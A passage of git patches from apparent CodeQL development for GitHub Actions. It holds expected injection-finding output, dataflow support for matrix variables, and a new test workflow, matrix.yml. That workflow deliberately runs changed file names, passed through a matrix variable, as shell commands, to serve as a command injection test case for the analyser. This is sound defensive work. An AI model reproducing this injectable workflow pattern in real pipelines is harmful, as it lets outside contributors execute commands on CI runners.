.github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | +| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | +| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | semmle.label | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | semmle.label | uses: . ... low.yml [workflow-output2] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | semmle.label | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | semmle.label | uses: o ... .yml@v1 | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | semmle.label | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | semmle.label | echo ${ ... put2 }} | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | +| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | +| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | +subpaths +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential injection from the ${{ steps.remove_quotations.outputs.replaced }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output1 }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output2 }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call3.outputs.workflow-output }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call4.outputs.workflow-output }}, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential injection from the ${{ steps.changed-files.outputs.all_changed_files }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential injection from the ${{ env.ISSUE_BODY_PARSED }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.auto_branch }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.destination_branch }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.pr_message }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.user_name }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. | +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | Potential injection from the ${{ steps.replace.outputs.value }}, which may be controlled by an external user. | +| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | Potential injection from the ${{ inputs.who-to-greet }}, which may be controlled by an external user. | From 447b65e7a96b6dd4d3fe41c76d8d8f8d95564d1b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 12:37:41 +0100 Subject: [PATCH 077/707] Add script to build full DBs (testproj ones remove source code origin) --- build-test-dbs.sh | 5 +++++ 1 file changed, 5 insertions(+) create mode 100755 build-test-dbs.sh diff --git a/build-test-dbs.sh b/build-test-dbs.sh new file mode 100755 index 000000000000..d8fc4359b927 --- /dev/null +++ b/build-test-dbs.sh @@ -0,0 +1,5 @@ +#!/bin/bash +rm -rf src-test.testproj || true +rm -rf lib-test.testproj || true +codeql database create src-test.testproj -l yaml -s ql/src/test +codeql database create lib-test.testproj -l yaml -s ql/lib/test From 8a9ec88b36422ab7f40bedd3abb5a07492beee54 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 13:21:29 +0100 Subject: [PATCH 078/707] feat(matrix): Add support for flow through matrix vars --- ql/lib/codeql/actions/Ast.qll | 78 +++++++++++++++++-- .../actions/controlflow/internal/Cfg.qll | 22 +++++- .../dataflow/internal/DataFlowPrivate.qll | 15 +++- ql/src/{test => Debug}/partial.ql | 2 +- ql/src/test/.github/workflows/matrix.yml | 42 ++++++++++ ql/src/test/partial.expected | 28 ------- ql/src/test/test.expected | 10 +++ 7 files changed, 159 insertions(+), 38 deletions(-) rename ql/src/{test => Debug}/partial.ql (92%) create mode 100644 ql/src/test/.github/workflows/matrix.yml delete mode 100644 ql/src/test/partial.expected diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2a506f2100c1..c2b1cda8277b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -81,6 +81,8 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { } Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + + StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -125,6 +127,23 @@ class OutputsStmt extends Statement instanceof YamlMapping { string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } +class StrategyStmt extends Statement instanceof YamlMapping { + YamlMapping parent; + + StrategyStmt() { parent.lookup("strategy") = this } + + /** + * Gets a specific matric expression (YamlMapping) by name. + */ + MatrixVariableExpr getMatrixVariableExpr(string name) { + this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result + } + + string getAMatrixVariableName() { + this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) + } +} + class InputExpr extends Expression instanceof YamlString { InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } } @@ -138,6 +157,14 @@ class OutputExpr extends Expression instanceof YamlString { } } +class MatrixVariableExpr extends Expression instanceof YamlString { + MatrixVariableExpr() { + exists(StrategyStmt outputs | + outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this + ) + } +} + /** * A Job is a collection of steps that run in an execution environment. */ @@ -191,6 +218,8 @@ class JobStmt extends Statement instanceof Actions::Job { IfStmt getIfStmt() { result = super.getIf() } Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + + StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } } /** @@ -332,7 +361,8 @@ class ExprAccessExpr extends Expression instanceof YamlString { class CtxAccessExpr extends ExprAccessExpr { CtxAccessExpr() { expr.regexpMatch([ - stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex() + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + matrixCtxRegex() ]) } @@ -342,22 +372,28 @@ class CtxAccessExpr extends ExprAccessExpr { } private string stepsCtxRegex() { - result = "\\bsteps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string needsCtxRegex() { - result = "\\bneeds\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string jobsCtxRegex() { - result = "\\bjobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } -private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } + +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } private string inputsCtxRegex() { - result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" or - result = "\\bgithub\\.event\\.inputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) +} + +bindingset[regex] +private string wrapRegexp(string regex) { + result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] } /** @@ -487,3 +523,31 @@ class EnvCtxAccessExpr extends CtxAccessExpr { ) } } + +/** + * Holds for an expression accesing the `matrix` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ matrix.foo }}` + */ +class MatrixCtxAccessExpr extends CtxAccessExpr { + string fieldName; + + MatrixCtxAccessExpr() { + expr.regexpMatch(matrixCtxRegex()) and + fieldName = expr.regexpCapture(matrixCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override Expression getRefExpr() { + exists(WorkflowStmt w | + w.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + w.getAChildNode*() = this + ) + or + exists(JobStmt j | + j.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + j.getAChildNode*() = this + ) + } +} diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 94a2c6a71e2c..b8137172b8c9 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -174,6 +174,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt ( child = this.(ReusableWorkflowStmt).getInputsStmt() or child = this.(ReusableWorkflowStmt).getOutputsStmt() or + child = this.(ReusableWorkflowStmt).getStrategyStmt() or child = this.(ReusableWorkflowStmt).getAJobStmt() ) and l = child.getLocation() @@ -185,7 +186,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt else result = rank[i](Expression child, Location l | - child = super.getAJobStmt() and + ( + child = super.getAJobStmt() or + child = super.getStrategyStmt() + ) and l = child.getLocation() | child @@ -225,6 +229,21 @@ private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { private class OutputExprTree extends LeafTree instanceof OutputExpr { } +private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getMatrixVariableExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } + private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = @@ -232,6 +251,7 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { ( child = super.getAStepStmt() or child = super.getOutputsStmt() or + child = super.getStrategyStmt() or child = super.getUsesExpr() ) and l = child.getLocation() diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 43239e29485d..b9aafb8ec948 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -133,7 +133,7 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { - // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env or inputs + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env, matrix or inputs name = any(StepsCtxAccessExpr a).getFieldName() or name = any(NeedsCtxAccessExpr a).getFieldName() or name = any(JobsCtxAccessExpr a).getFieldName() @@ -209,6 +209,18 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } +/** + * Holds if there is a local flow step between a ${{}} expression accesing a matrix variable and the matrix itself + * e.g. ${{ matrix.foo }} + */ +predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, MatrixCtxAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom + ) +} + /** * Holds if there is a local flow step between a ${{}} expression accesing an env var and the var definition itself * e.g. ${{ env.foo }} @@ -234,6 +246,7 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { stepsCtxLocalStep(nodeFrom, nodeTo) or needsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or + matrixCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } diff --git a/ql/src/test/partial.ql b/ql/src/Debug/partial.ql similarity index 92% rename from ql/src/test/partial.ql rename to ql/src/Debug/partial.ql index 779749f82f66..c0a694455dc9 100644 --- a/ql/src/test/partial.ql +++ b/ql/src/Debug/partial.ql @@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "calling_workflow.yml" + source.getLocation().getFile().getBaseName() = "matrix.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/test/.github/workflows/matrix.yml b/ql/src/test/.github/workflows/matrix.yml new file mode 100644 index 000000000000..30672ecaaa70 --- /dev/null +++ b/ql/src/test/.github/workflows/matrix.yml @@ -0,0 +1,42 @@ +name: "CodeQL Auto Language" + +on: + push: + branches: [ main ] + pull_request: + branches: [ main ] + schedule: + - cron: '17 19 * * 6' + +jobs: + create-matrix: + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.set-matrix.outputs.all_changed_files }} + steps: + - name: Get changed files + id: set-matrix + uses: tj-actions/changed-files@v40 + + analyze: + needs: create-matrix + if: ${{ needs.create-matrix.outputs.matrix != '[]' }} + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ${{ fromJSON(needs.create-matrix.outputs.matrix) }} + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + + # Initializes the CodeQL tools for scanning. + - run: | + ${{ matrix.language }} diff --git a/ql/src/test/partial.expected b/ql/src/test/partial.expected deleted file mode 100644 index 98aea83de2e5..000000000000 --- a/ql/src/test/partial.expected +++ /dev/null @@ -1,28 +0,0 @@ -edges -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | -#select -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | this source | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | This node receives taint from $@. | 